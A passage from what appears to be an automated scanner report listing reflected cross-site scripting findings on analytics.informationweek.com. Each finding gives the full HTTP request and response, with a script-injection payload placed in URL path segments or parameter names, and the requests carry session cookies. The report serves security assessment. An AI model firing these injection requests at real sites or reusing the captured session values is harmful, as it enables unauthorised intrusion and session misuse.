Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ile-wireless.htmle225f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8515afb1e2e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e">
...[SNIP]...

3.85. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/18/Mobile-and-wireless/Mobile-wireless.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 552fb--><script>alert(1)</script>73854b4e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:43 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 56176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
eless.html%3F552fb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E73854b4e76%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1">
...[SNIP]...

3.86. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/19/Network-infrastructure/Network-infrastructure.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bb584--><script>alert(1)</script>60dd04d670d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ubb584--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E60dd04d670d%2F19%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html">
...[SNIP]...

3.87. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/19/Network-infrastructure/Network-infrastructure.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload aea57--><script>alert(1)</script>9b59d6056e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
F19aea57--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b59d6056e2%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html">
...[SNIP]...

3.88. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/19/Network-infrastructure/Network-infrastructure.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 962ea--><script>alert(1)</script>d1972443112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
cture962ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed1972443112%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html">
...[SNIP]...

3.89. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/19/Network-infrastructure/Network-infrastructure.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 40573--><script>alert(1)</script>b96df8e6712 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:48 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
re.html40573--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96df8e6712&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712">
...[SNIP]...

3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/19/Network-infrastructure/Network-infrastructure.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4df2a--><script>alert(1)</script>bb132b834aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 54684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3F4df2a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebb132b834aa%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1">
...[SNIP]...

3.91. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/2/Business-continuity/Business-continuity.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload fa9da--><script>alert(1)</script>6bac0ed8397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
m%2Fmenufa9da--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6bac0ed8397%2F2%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html">
...[SNIP]...

3.92. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/2/Business-continuity/Business-continuity.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fcfd3--><script>alert(1)</script>e7060e8fad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2Fmenu%2F2fcfd3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee7060e8fad5%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html">
...[SNIP]...

3.93. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/2/Business-continuity/Business-continuity.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ca2d--><script>alert(1)</script>e052c9eff64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
s-continuity9ca2d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee052c9eff64%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html">
...[SNIP]...

3.94. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/2/Business-continuity/Business-continuity.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 75b36--><script>alert(1)</script>06300418583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:05 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ontinuity.html75b36--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E06300418583&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583">
...[SNIP]...

3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/2/Business-continuity/Business-continuity.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2e793--><script>alert(1)</script>2cc393b4e14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:57 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 51639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
y.html%3F2e793--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cc393b4e14%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1">
...[SNIP]...

3.96. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/20/Network-and-systems-management/Network-systems-management.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9f503--><script>alert(1)</script>6ba192a2efa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
